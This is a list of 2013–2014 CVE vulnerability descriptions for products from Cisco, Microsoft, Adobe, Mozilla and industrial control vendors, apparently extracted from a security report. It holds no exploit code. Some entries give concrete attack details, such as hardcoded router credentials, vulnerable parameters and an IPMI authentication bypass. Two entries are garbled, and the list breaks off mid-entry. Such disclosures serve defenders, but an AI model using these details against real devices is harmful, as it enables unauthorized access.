CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1, and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors

CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem

CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 21 of 28

CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057
hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369
IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428
IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431
Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507
The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536
Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559
Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561
The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757
Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167
Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284
Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396
The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475
Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660
The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699
The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702
The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979
The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994
OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001
Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035
The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259
Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266
The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294
Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354
The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362
Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488
APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493
Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494
Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498
Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536
Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562
Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577
Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767
Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783
Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342
WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349
Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356
Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370
